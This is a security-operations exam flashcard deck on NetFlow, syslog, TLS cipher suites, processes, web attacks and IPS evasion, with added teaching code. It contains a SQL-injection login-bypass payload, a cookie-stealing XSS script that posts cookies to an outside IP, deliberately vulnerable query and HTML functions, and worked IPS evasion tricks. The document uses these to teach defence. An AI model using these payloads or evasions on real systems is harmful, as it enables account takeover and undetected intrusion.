*** Most important. Based on blueprint Flashcards Preview

Flashcards in *** Most important. Based on blueprint Deck (83)
1
Q

CAPWAP

A

Control And Provisioning of Wireless Access Points. Tunnels control and data traffic between a lightweight AP (LWAP) and the WLC over UDP (5246 control, 5247 data), so it is routable across L3 boundaries. Also carries wireless IPS functions and much more.

2
Q

ARP

A

Address Resolution Protocol. Resolves an L3 (IPv4) address to an L2 (MAC) address, so it operates between L2 and L3; it is carried directly in Ethernet frames, not inside IP.

3
Q

ARP Ethertype

A

0x0806

4
Q

DNS Resolver

A

The stub resolver on the local client: it hands the query to a recursor and caches the answer.

5
Q

DNS Recursor

A

The recursive server (typically the internal DNS server) that walks the root, TLD and authoritative servers on the client's behalf and returns the final answer.

6
Q

Bridges vs. Switches

A

Bridges use SW bridging logic. Switches use HW bridging logic.

7
Q

Cisco AMP

A

Advanced Malware Protection. Covers the before/during/after attack continuum. Looks up the file's SHA-256 hash against cloud reputation, analyses unknown files in the cloud, applies machine learning, records file trajectory (where a file went after it entered) and uses threat-intel feeds.

8
Q

Cisco WSA

A

Web Security Appliance. URL Filtering. Websense type features.

9
Q

Cisco CWS

A

Cloud Web Security. Essentially Websense-style web filtering delivered from the cloud: the ASA (or another connector) redirects the web request to CWS, where the allow/block decision is made.

10
Q

Cisco ESA

A

Email Security Appliance. Incoming reputation filter, outgoing DLP

11
Q

Cisco CES

A

ESA in the cloud

12
Q

Cisco Firepower

A

NGFW with VPN, IPS, AMP, DNS inspection, application visibility and control, reputation-based filtering, URL filtering, SSL decryption, and so on

13
Q

Netflow

A

Collects and monitors network traffic flow data exported by routers and switches; provides an audit trail of who talked to whom.
A flow is a unidirectional series of packets between a source and a destination, so a two-way conversation shows up as two flows.

14
Q

What does Netflow data contain?

A

Metadata about each flow:
5-tuple (source/destination IP, source/destination port, protocol)
Interfaces (ingress/egress)
Duration of the communication
Transmission rate
Amount of data
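
Added example (not from the deck or from Cisco): a parser for a NetFlow v5 export datagram that pulls out exactly the metadata the card lists, then folds the unidirectional flows into two-way sessions. The field layout is Cisco's published v5 format; the addresses, counters and the whole datagram are constructed for the demo.

```python
import struct
from ipaddress import IPv4Address

# NetFlow v5 export layout (network byte order): a 24-byte header followed by
# up to 30 fixed 48-byte flow records. Field order follows Cisco's v5 format.
V5_HEADER = struct.Struct("!HHIIIIBBH")
V5_RECORD = struct.Struct("!4s4s4sHHIIIIHHBBBBHHBBH")
PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}


def parse_v5(datagram):
    """Parse one NetFlow v5 datagram into a list of per-flow dicts carrying the
    5-tuple, in/out interfaces, duration, packet/byte counts and a derived rate."""
    if len(datagram) < V5_HEADER.size:
        raise ValueError("datagram shorter than a v5 header")
    (version, count, _uptime, unix_secs, _nsecs, flow_seq,
     _engine_type, _engine_id, _sampling) = V5_HEADER.unpack_from(datagram, 0)
    if version != 5:
        raise ValueError("not NetFlow v5 (version %d)" % version)
    if len(datagram) < V5_HEADER.size + count * V5_RECORD.size:
        raise ValueError("header announces %d records but the datagram is truncated" % count)
    flows = []
    for i in range(count):
        (src, dst, _nexthop, in_if, out_if, pkts, octets, first, last,
         sport, dport, _pad1, tcp_flags, proto, _tos, _src_as, _dst_as,
         _src_mask, _dst_mask, _pad2) = V5_RECORD.unpack_from(
            datagram, V5_HEADER.size + i * V5_RECORD.size)
        duration_ms = last - first          # first/last are router uptime in ms
        flows.append({
            "five_tuple": (str(IPv4Address(src)), sport,
                           str(IPv4Address(dst)), dport,
                           PROTO_NAMES.get(proto, str(proto))),
            "in_if": in_if, "out_if": out_if,
            "packets": pkts, "bytes": octets,
            "duration_ms": duration_ms,
            # average rate in bit/s; None for a single-packet flow (zero duration)
            "bits_per_sec": octets * 8 * 1000 // duration_ms if duration_ms else None,
            "tcp_flags": tcp_flags,
            "export_time": unix_secs, "sequence": flow_seq,
        })
    return flows


def pair_sessions(flows):
    """Fold unidirectional flows into bidirectional sessions: a flow whose
    5-tuple is the mirror image of one already seen is the reply direction."""
    sessions = {}
    for f in flows:
        sip, sp, dip, dp, proto = f["five_tuple"]
        mirror = (dip, dp, sip, sp, proto)
        if mirror in sessions:
            s = sessions[mirror]
            s["bytes_reply"] += f["bytes"]
            s["packets_reply"] += f["packets"]
        else:
            s = sessions.setdefault(f["five_tuple"], {
                "client": sip, "server": dip, "server_port": dp, "proto": proto,
                "bytes_sent": 0, "bytes_reply": 0,
                "packets_sent": 0, "packets_reply": 0})
            s["bytes_sent"] += f["bytes"]
            s["packets_sent"] += f["packets"]
    return list(sessions.values())


def _record(src, sport, dst, dport, proto, pkts, octets, first, last,
            in_if=1, out_if=2, flags=0x1b):
    """Pack one constructed v5 record (addresses and counters are made up)."""
    return V5_RECORD.pack(IPv4Address(src).packed, IPv4Address(dst).packed,
                          b"\0\0\0\0", in_if, out_if, pkts, octets, first, last,
                          sport, dport, 0, flags, proto, 0, 0, 0, 24, 24, 0)


# Constructed datagram: an HTTPS request flow, its reply flow, and one DNS query.
SAMPLE_DATAGRAM = (
    V5_HEADER.pack(5, 3, 1_000_000, 1_700_000_000, 0, 42, 0, 0, 0)
    + _record("10.1.1.25", 52344, "198.51.100.7", 443, 6, 40, 2_400, 990_000, 1_000_000)
    + _record("198.51.100.7", 443, "10.1.1.25", 52344, 6, 30, 31_000, 990_010, 1_000_000,
              in_if=2, out_if=1)
    + _record("10.1.1.25", 50001, "203.0.113.9", 53, 17, 1, 80, 999_500, 999_500)
)

if __name__ == "__main__":
    for flow in parse_v5(SAMPLE_DATAGRAM):
        print(flow["five_tuple"], flow["bytes"], "bytes", flow["duration_ms"], "ms")
    for session in pair_sessions(parse_v5(SAMPLE_DATAGRAM)):
        print(session)
```

The two TCP records are the two halves of one HTTPS session; pairing them gives the "session data" view (bytes sent versus bytes received), which is also the shape of record a data-loss rule would inspect. Note the truncation check: a collector that trusts the record count in the header without checking the datagram length reads garbage.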
15
Q

Netflow vs. IPS

A

Netflow looks at headers. IPS does deep packet analysis.

Netflow is information about comms. IPS can drop packets.

16
Q

Runbook automation

A

Automated reactions to detected events. Can minimize the time between discovery and remediation.

17
Q

Runbook parts

A

Tools, Workflows, Processes

18
Q

Sliding Window

A

Relates to anomaly detection. Needs to be long enough to define normal traffic.

19
Q

Non-discretionary access control

A

Role Based AC. Job function related.

20
Q

Network vs. Host AV

A

Network AV takes action on files that are traversing the network.

Host AV is run by endpoints.

21
Q

Agent vs. Agentless

A

Agent-based tools run software on each endpoint (host AV, for example). Agentless tools observe hosts from outside; NetFlow is agentless because the network devices export the data.

22
Q

SIEM Capabilities

A

Monitoring
Incident response
Anomaly detection
Real-time rule-based alerts
Correlation
Logging and reporting

23
Q

New Syslog name

A

rsyslog (old was syslogd)

24
Q

Syslog config file location

A

/etc/syslog.conf for classic syslogd; rsyslog reads /etc/rsyslog.conf and /etc/rsyslog.d/*.conf.

25
Q

ISO/IEC 27002:2013

A

Provides guidelines for organizational information security standards and information security management practices, including the selection, implementation and management of controls.

26
Q

Vulnerability management

A

identifying, classifying, remediating, and mitigating vulnerabilities in software, firmware, and hardware.

27
Q

Configuration management

A

process for establishing and maintaining consistency of a product’s performance, functional requirements, and design throughout the product’s life cycle.

28
Q

Digital signature creation

A

Hash the document
Encrypt the hash with private key of signer
Encrypted hash is appended to document

29
Q

Digital signature verification

A

Recipient obtains the signer's public key (normally from the signer's certificate).
Recipient decrypts the signature with that public key, leaving the original hash.
Recipient rehashes the document. If the two hashes match, the document is authentic and unaltered.

30
Q

CSR contains

A

System (common) name, organization, location, and the enrolling system's public key.

31
Q

TACACS+ Hashing algorithm

A

MD5

32
Q

MD5 vs. SHA-1

A

128-bit vs. 160-bit digest.

Both have practical collision attacks; NIST recommends avoiding both (use SHA-2 or SHA-3).

33
Q

ECDHE_ECDSA

A

A cipher-suite pairing: ECDHE is the (ephemeral, forward-secret) key exchange and ECDSA is the authentication (signature) algorithm.

34
Q

DSA

A

Asymmetric. Digital Signature Algorithm.

Creates digital signatures over a hash of the message (FIPS 186).

35
Q

PRF

A

Pseudorandom Function

36
Q

Cipher Suite Contains…

A

Authentication
Key exchange
Encryption algorithm
MAC (e.g. HMAC-SHA; for AEAD suites such as AES-GCM the MAC is part of the cipher)
PRF (SHA-256 in TLS 1.2 unless the suite names SHA-384)

37
Q

TLS 1.2

A

Defines TLS_RSA_WITH_AES_128_CBC_SHA as the mandatory-to-implement cipher suite (RSA key exchange, AES-128-CBC, HMAC-SHA1) and moves the PRF to SHA-256.

38
Q

TLS 1.2 Mandatory Cipher Suite

A

TLS_RSA_WITH_AES_128_CBC_SHA (RSA, AES, SHA)

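Added example (not from the deck or from Cisco) for the three cipher-suite cards and the PRF card above: it splits an IANA cipher suite name into the five components of card 36 and implements the TLS 1.2 PRF from RFC 5246 (P_hash over HMAC) to derive a master secret and key block. The pre-master secret and random values are constructed; the suite names and the label strings are the real ones.

```python
import hmac
import re

# IANA naming: TLS_<key exchange>[_<auth>]_WITH_<cipher>_<hash>
SUITE_RE = re.compile(
    r"^TLS_(?P<kx>ECDHE|ECDH|DHE|DH|RSA|PSK)(?:_(?P<auth>ECDSA|RSA|DSS|PSK|anon))?"
    r"_WITH_(?P<rest>[A-Z0-9_]+)$")
HASH_NAME = {"MD5": "MD5", "SHA": "SHA1", "SHA256": "SHA256", "SHA384": "SHA384"}
MANDATORY_TLS12 = "TLS_RSA_WITH_AES_128_CBC_SHA"     # RFC 5246, section 9


def parse_cipher_suite(name):
    """Break a suite name into authentication, key exchange, cipher, MAC and PRF."""
    m = SUITE_RE.match(name)
    if not m:
        raise ValueError("unrecognised cipher suite name: %s" % name)
    kx, auth, rest = m.group("kx"), m.group("auth"), m.group("rest")
    enc, hash_suffix = rest.rsplit("_", 1)
    aead = any(tag in enc for tag in ("GCM", "CCM", "POLY1305"))
    return {
        "key_exchange": kx,
        "authentication": auth or kx,            # TLS_RSA_*: RSA does both jobs
        "encryption": enc,
        "mac": "AEAD" if aead else "HMAC-" + HASH_NAME.get(hash_suffix, hash_suffix),
        # TLS 1.2 rule: suites that do not name SHA256/SHA384 use the SHA-256 PRF
        "prf": hash_suffix if hash_suffix in ("SHA256", "SHA384") else "SHA256",
        "forward_secrecy": kx in ("ECDHE", "DHE"),
    }


def p_hash(secret, seed, length, digest="sha256"):
    """P_hash from RFC 5246 section 5: concatenate HMAC(secret, A(i) || seed)
    with A(0) = seed and A(i) = HMAC(secret, A(i-1)) until `length` bytes."""
    out, a = b"", seed
    while len(out) < length:
        a = hmac.new(secret, a, digest).digest()
        out += hmac.new(secret, a + seed, digest).digest()
    return out[:length]


def tls12_prf(secret, label, seed, length, digest="sha256"):
    """PRF(secret, label, seed) = P_<hash>(secret, label || seed)."""
    return p_hash(secret, label.encode("ascii") + seed, length, digest)


def derive_master_secret(pre_master_secret, client_random, server_random):
    """master_secret = PRF(pre_master, "master secret", ClientHello.random || ServerHello.random)[0..47]"""
    return tls12_prf(pre_master_secret, "master secret", client_random + server_random, 48)


def derive_key_block(master_secret, client_random, server_random, length):
    """key_block = PRF(master, "key expansion", server_random || client_random).
    Note the reversed random order compared with the master secret derivation."""
    return tls12_prf(master_secret, "key expansion", server_random + client_random, length)


if __name__ == "__main__":
    for suite in (MANDATORY_TLS12, "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256",
                  "TLS_DHE_RSA_WITH_AES_256_CBC_SHA256"):
        print(suite, parse_cipher_suite(suite))
    # Constructed values: a 48-byte RSA pre-master secret and two 32-byte randoms.
    pre_master = b"\x03\x03" + b"\x11" * 46
    client_random, server_random = b"\xaa" * 32, b"\xbb" * 32
    master = derive_master_secret(pre_master, client_random, server_random)
    print("master secret:", master.hex())
    print("key block:", derive_key_block(master, client_random, server_random, 72).hex())
```

The parser makes the card's point concrete: in TLS_RSA_WITH_AES_128_CBC_SHA a single algorithm (RSA) covers both authentication and key exchange and there is no forward secrecy, while in an ECDHE_ECDSA suite the two jobs are split. The 72-byte key block is what AES_128_CBC_SHA needs (two 20-byte MAC keys plus two 16-byte cipher keys).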
39
Q

PKCS

A

Public Key Cryptography Standards. Numbered standards, e.g. PKCS #1 (RSA encryption and signature padding), PKCS #3 (Diffie-Hellman), PKCS #10 (certificate signing requests), PKCS #12 (key and certificate containers), and more.

40
Q

Windows Process

A

Instance of an executing program

41
Q

Windows thread

A

Basic unit that OS allocates processing time to. Can execute any part of the process code.

42
Q

Windows object handle

A

A reference through which a process accesses kernel objects (files, registry keys, events, etc.).

Processes can't touch kernel objects directly; every access goes through a handle, and the kernel checks the requested access against the object's ACL when the handle is opened.

43
Q

Windows Memory allocated to which modes

A

Kernel mode and User mode

44
Q

Transaction data

A

Log files for various services (HTTP, SMTP, Linux system logs, etc.).

Records both the client's actions and the system's own actions.

45
Q

Session data

A

Metadata similar to NetFlow or a phone bill: 5-tuple, timestamps, byte counts, etc.

A summary of the communication between two parties, without the content.

46
Q

Extracted content

A

Mined from network traffic

47
Q

Facility

A

application or process that submits the log message.

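Added example (not from the deck or from Cisco) for the facility card above and for the sliding-window and SIEM rule cards earlier in the deck: it decodes the PRI of classic syslog lines into facility and severity (PRI = facility * 8 + severity), then runs a real-time rule over the parsed events, alerting when one source produces five failed SSH logins inside a 60-second sliding window. The log lines are constructed; the threshold, window and sshd message format are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "security", "console",
              "clock"] + ["local%d" % i for i in range(8)]

# Classic (RFC 3164-style) line: <PRI>Mmm dd hh:mm:ss host tag[pid]: message
LINE_RE = re.compile(r"^<(\d{1,3})>(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (\S+) "
                     r"([^\s:\[]+)(?:\[(\d+)\])?: (.*)$")
FAIL_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")


def parse_line(line, year=2024):
    """Decode PRI into facility/severity and split the rest of the line.
    Returns None for lines that are not syslog."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pri, ts, host, tag, pid, msg = m.groups()
    pri = int(pri)
    if pri > 191:                       # 23 * 8 + 7 is the largest valid PRI
        return None
    return {"facility": FACILITIES[pri // 8], "severity": SEVERITIES[pri % 8],
            "time": datetime.strptime("%d %s" % (year, ts), "%Y %b %d %H:%M:%S"),
            "host": host, "tag": tag, "pid": int(pid) if pid else None, "msg": msg}


def brute_force_alerts(events, threshold=5, window_s=60):
    """Sliding-window rule: alert when one source produces `threshold` failed
    SSH logins within any `window_s`-second window. One alert per source."""
    recent = defaultdict(deque)
    alerted, alerts = set(), []
    for ev in events:
        if ev["tag"] != "sshd":
            continue
        m = FAIL_RE.search(ev["msg"])
        if not m:
            continue
        src = m.group(2)
        q = recent[src]
        q.append(ev["time"])
        while (ev["time"] - q[0]).total_seconds() > window_s:   # slide the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"src": src, "host": ev["host"], "count": len(q),
                           "first": q[0], "last": ev["time"]})
    return alerts


# Constructed sample: five failures from one source within 37 s, plus noise.
SAMPLE_LOG = """\
<38>Mar 10 14:02:01 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
<38>Mar 10 14:02:09 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51240 ssh2
<38>Mar 10 14:02:15 bastion sshd[2103]: Failed password for root from 203.0.113.5 port 51251 ssh2
<86>Mar 10 14:02:20 bastion sshd[2105]: Accepted publickey for deploy from 10.1.1.25 port 40022 ssh2
<38>Mar 10 14:02:21 bastion sshd[2107]: Failed password for root from 203.0.113.5 port 51260 ssh2
<38>Mar 10 14:02:33 bastion sshd[2109]: Failed password for root from 198.51.100.7 port 33001 ssh2
<38>Mar 10 14:02:38 bastion sshd[2110]: Failed password for root from 203.0.113.5 port 51270 ssh2
<4>Mar 10 14:02:40 bastion kernel: eth0: link down
""".splitlines()


def run(lines=SAMPLE_LOG):
    """Parse the lines and apply the rule; returns (events, alerts)."""
    events = [e for e in map(parse_line, lines) if e]
    return events, brute_force_alerts(events)


if __name__ == "__main__":
    events, alerts = run()
    for e in events:
        print(e["facility"], e["severity"], e["tag"], e["msg"][:50])
    print(alerts)
```

PRI 38 decodes to auth/info and 86 to authpriv/info, which is why filtering on the facility alone is not enough to isolate authentication failures: the rule has to look at the message. The deque per source is the sliding window of card 18; shrinking `window_s` to 30 drops the alert because only four of the five failures fall inside any 30-second span.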
48
Q

RFC 1918

A

Private IPv4 address blocks (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) for internal use; not routed on the Internet.

49
Q

NSA Suite B

A

RFC 6379 (Suite B for IPsec); RFC 6460 profiles it for TLS.
Cryptographic algorithms devices must support to meet US federal (NSA) standards; since superseded by the CNSA suite.
AES-128 and AES-256 (GCM, which builds on CTR mode)
ECDSA (signatures) and ECDH (key agreement) on the P-256 and P-384 curves
SHA-256 and SHA-384

50
Q

Linux PS command

A

Get information about processes

51
Q

ps -f

A

Full-format listing: UID, PID, PPID, CPU, start time, TTY and command.

52
Q

ps -e

A

Every process (all users), equivalent to -A.

53
Q

ps -ef

A

Full-format listing of every process.

54
Q

ps aux

A

BSD-syntax equivalent of ps -ef: a = all users' processes, u = user-oriented format, x = include processes without a controlling terminal.

55
Q

ps -fC sshd

A

-C selects processes by command name (here sshd); -f gives the full format.

56
Q

Alert data

A

Generally produced by IPS/IDS

57
Q

packets, bytes, and bandwidth =

A

NetFlow

58
Q

fork() return value in the child process

A

0. The parent receives the child's PID (and -1 if the fork fails).

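Added example (not from the deck) that demonstrates the card above and the PPID column of the ps cards: the process forks, the child reports over a pipe what fork() returned to it together with its own PID and PPID, and the parent compares that with the PID it received. Linux/Unix only, since it uses os.fork().

```python
import os


def fork_and_report():
    """Fork once and have the child tell the parent what fork() returned to it."""
    read_end, write_end = os.pipe()
    pid = os.fork()
    if pid == 0:
        # Child: fork() returned 0. Report it, the child's own PID and its
        # parent's PID (the PPID column ps -ef shows), then exit here so that
        # the parent's code path below never runs twice.
        os.close(read_end)
        os.write(write_end, ("%d,%d,%d" % (pid, os.getpid(), os.getppid())).encode())
        os.close(write_end)
        os._exit(0)
    # Parent: fork() returned the child's PID.
    os.close(write_end)
    chunks = []
    while True:
        chunk = os.read(read_end, 64)
        if not chunk:
            break
        chunks.append(chunk)
    os.close(read_end)
    _, status = os.waitpid(pid, 0)          # reap the child; avoids a zombie
    child_saw, child_pid, child_ppid = (int(x) for x in b"".join(chunks).decode().split(","))
    return {"parent_saw": pid, "child_saw": child_saw, "child_pid": child_pid,
            "child_ppid": child_ppid, "parent_pid": os.getpid(),
            "exit_status": os.WEXITSTATUS(status)}


if __name__ == "__main__":
    print(fork_and_report())
```

The same code runs in both processes after the fork; the only thing that tells them apart is the return value, which is why the child must leave through os._exit() rather than fall through into the parent's half of the function.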
59
Q

AV vs. Anti-Malware

A

AV: signature/heuristic/behavior-based; low efficacy against novel malware.
AM: anomaly detection, big data, continuous analysis, advanced analytics.

60
Q

App visibility and control

A

Differentiating between parts of services (Allow IM, but not file transfer. Allow Facebook, but not facebook games)

61
Q

NextGen FW Connection Event

A

A connection that matched an access control rule (allowed or blocked), logged at the start or end of the connection.

Time, hosts, protocols, amount of data

62
Q

IPS/Intrusion Event

A

Based on IPS rule that triggers event.

Packet-level info:
Time
5-tuple
Country (geolocation)
Triggering rule

63
Q

NGFW Host event

A

Host profile
IOC’s
Category
Event type

64
Q

Network discovery events

A

Triggered by changes on the network

65
Q

Netflow event

A

Used to detect data loss using Cisco Stealthwatch.

Flows denied by access rule

66
Q

NTP attacks

A

Amplification (e.g. monlist abuse) for DDoS. Falsified time advertisements to skew system clocks and throw off log timelines.

Mitigation: authenticate the time source (NTP authentication with the server).

67
Q

Web proxy log

A

Precise logging of browsing sessions and can help investigate web based attacks.

68
Q

Attack surface vs. Vulnerabilty

A

Surface is “total sum of all the vulnerabilities”

Vulnerability is a defect in SW or HW.

69
Q

Attack surfaces

A

Software, physical, network, human

70
Q

SQL Injection

A

Can read or modify data, execute admin operations on the database, and sometimes issue OS commands.

Countermeasures: parameterized queries (prepared statements) plus input validation.

71
Q

Command injection attacks (2)

A

SQL injection. XSS

Input validation and IPS

72
Q

XSS

A

Injection of malicious scripts into a web page so that they run in the victim's browser.

Caused by the web application placing untrusted input into its pages without validation or output encoding; the script then runs with the origin of the vulnerable site.

73
Q

XSS Countermeasures

A

Output encoding and input validation in the application; DNS blocking, web proxy filtering and IPS on the network; user education.

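Added example (not from the deck or from Cisco) for the SQL injection and XSS cards above: a deliberately vulnerable login query next to its parameterized form, and a deliberately vulnerable HTML greeting next to its output-encoded form, with the allow-list input validation the cards recommend. The table, accounts and payloads are constructed; passwords are stored in clear only to keep the demo short.

```python
import html
import re
import sqlite3

# Constructed payloads: a comment-based SQLi login bypass and a cookie-stealing script.
SQLI_PAYLOAD = "alice' --"
XSS_PAYLOAD = "<script>document.location='http://203.0.113.5/?c='+document.cookie</script>"


def make_db():
    """In-memory table with two constructed accounts (clear-text passwords for brevity)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: user input is pasted into the SQL text, so a
    quote in the username ends the literal and '--' comments out the password check."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchall()


def login_hardened(conn, username, password):
    """Parameterized query: values travel separately from the SQL, so the
    same payload is just an unusual username that matches nobody."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def render_greeting_vulnerable(name):
    """Deliberately vulnerable: user input is placed into HTML unencoded."""
    return "<p>Hello, %s!</p>" % name


def render_greeting_hardened(name):
    """Output encoding: the browser renders the payload as text, not markup."""
    return "<p>Hello, %s!</p>" % html.escape(name, quote=True)


def validate_username(name):
    """Allow-list input validation, the countermeasure both cards name.
    Rejects anything outside a conservative character set and length."""
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", name) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, SQLI_PAYLOAD, "wrong"))
    print("hardened:  ", login_hardened(db, SQLI_PAYLOAD, "wrong"))
    print("vulnerable:", render_greeting_vulnerable(XSS_PAYLOAD))
    print("hardened:  ", render_greeting_hardened(XSS_PAYLOAD))
    print("validate:  ", validate_username("alice"), validate_username(XSS_PAYLOAD))
```

Validation alone is the wrong primary control for XSS: a legitimate value such as an O'Brien surname or a product review with angle brackets must still be rendered, and only encoding at the point where data enters HTML makes that safe. For SQL the parameterized query is the primary control for the same reason.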
74
Q

IPS Evasion methods

A

Traffic fragmentation
Traffic substitution/insertion (Unicode characters)
Encryption/Tunneling

75
Q

Traffic fragmentation

A

IP fragmentation: fragment all IP traffic so that a sensor that does not reassemble fragments never sees the whole payload.

TCP segment overlap: see the next card.

76
Q

TCP fragmentation

A

Split the TCP stream into segments whose sequence ranges overlap, so that later data rewrites earlier data. If the sensor resolves the overlap differently from the target host (keeps the first copy where the host keeps the last, or vice versa), the sensor reassembles a different stream than the host and misses the attack.

77
Q

Traffic substitution

A

Substitute payload with other data that has the same meaning.

Unicode, case sensitivity change, substitute spaces with tabs.

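Added example (not from the deck or from Cisco) for the fragmentation/overlap card and the substitution card above. A small reassembler shows how the same overlapping segments give a harmless request under a "first data wins" policy and an attack request under a "last data wins" policy; a normalizer then shows how a naive substring signature misses case changes, percent and %u encoding, tabs and path tricks until the request is canonicalised. The signature path /cgi-bin/vuln.cgi, the segments and the requests are constructed.

```python
import re
from urllib.parse import unquote

# Hypothetical signature for a vulnerable CGI; the path is made up for the demo.
NAIVE_SIG = "GET /cgi-bin/vuln.cgi"
NORMAL_SIG = NAIVE_SIG.lower()


def reassemble(segments, policy="first"):
    """Rebuild a TCP stream from (seq, data) segments. Where byte ranges overlap,
    'first' keeps the data that arrived first and 'last' lets later data
    overwrite it. Real stacks differ in which they do, and that difference is
    the gap an overlap evasion exploits."""
    stream = {}
    for seq, data in segments:
        for i, byte in enumerate(data):
            if policy == "last" or (seq + i) not in stream:
                stream[seq + i] = byte
    if not stream:
        return b""
    return bytes(stream.get(i, 0) for i in range(min(stream), max(stream) + 1))


# Constructed segments: harmless bytes at seq 13 first, then the same range
# re-sent with the real payload.
SEGMENTS = [
    (0, b"GET /cgi-bin/"),
    (13, b"junk.htm"),
    (13, b"vuln.cgi"),
    (21, b" HTTP/1.0\r\n\r\n"),
]


def naive_match(request):
    return NAIVE_SIG in request


def overlap_report(segments=SEGMENTS):
    """Whether the naive signature fires under each overlap policy."""
    return {p: naive_match(reassemble(segments, p).decode("latin-1"))
            for p in ("first", "last")}


def normalize_http(request):
    """Undo the substitutions an attacker uses to disguise a request line."""
    s = re.sub(r"%u([0-9a-fA-F]{4})",
               lambda m: chr(int(m.group(1), 16)), request)   # IIS-style %uXXXX
    prev = None
    while prev != s:                       # repeat to defeat double encoding
        prev, s = s, unquote(s)
    s = s.lower()                          # case changes
    s = re.sub(r"[ \t]+", " ", s)          # tabs for spaces
    s = re.sub(r"(?:/\.)+/", "/", s)       # /./ self references
    s = re.sub(r"/{2,}", "/", s)           # doubled slashes
    return s


def normalized_match(request):
    return NORMAL_SIG in normalize_http(request)


DIRECT = "GET /cgi-bin/vuln.cgi HTTP/1.0"
EVASIONS = [
    ("case change", "GET /CGI-BIN/VULN.CGI HTTP/1.0"),
    ("percent encoding", "GET /cgi-bin/%76uln.cgi HTTP/1.0"),
    ("double percent encoding", "GET /cgi-bin/%2576uln.cgi HTTP/1.0"),
    ("IIS %u unicode encoding", "GET /cgi-bin/%u0076uln.cgi HTTP/1.0"),
    ("self-reference and double slash", "GET /cgi-bin/.//vuln.cgi HTTP/1.0"),
    ("tab instead of space", "GET\t/cgi-bin/vuln.cgi\tHTTP/1.0"),
]

if __name__ == "__main__":
    print("overlap:", overlap_report())
    for name, req in EVASIONS:
        print("%-32s naive=%-5s normalized=%s"
              % (name, naive_match(req), normalized_match(req)))
```

The overlap result is the whole lesson of the Ptacek-Newsham insertion/evasion papers: a sensor cannot know which stream the host saw unless it models the host's reassembly policy (target-based reassembly). The normalizer is what an HTTP preprocessor does before signatures run; decoding in a loop matters because a single decode turns %2576 into %76, which still slips past the signature.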
78
Q

Evasion: Tunneling

A

Hide traffic over permitted protocol like DNS, HTTP.

Or combine encryption & tunneling: HTTPS

79
Q

Protocol-level misinterpretation

A

Change aspects of packets to confuse IPS sensor.

Bad TCP checksum (the host discards the segment; a sensor that does not verify checksums keeps it)
Byte-order (big/little endian) assumptions

80
Q

Hard links

A

An extra directory entry for the same inode: the same file under a second name, indistinguishable from the original. Cannot span filesystems and normally cannot point to a directory (that is what a symbolic link does).

81
Q

Malware (3)

A

Virus, Worm, Trojan

82
Q

Remote vs. Local Exploit

A

Remote works over the network without prior access.

Local exploit requires prior access (an account on the system) and typically leads to privilege escalation. It does NOT require physical access; the initial access often comes from social engineering.

83
Q

AES CTR

A

AES in counter mode. GCM (Galois/Counter Mode) is the form NSA Suite B specifies and the one seen in practice.

Both build on counter mode; GCM adds a GHASH authentication tag, making it an AEAD mode.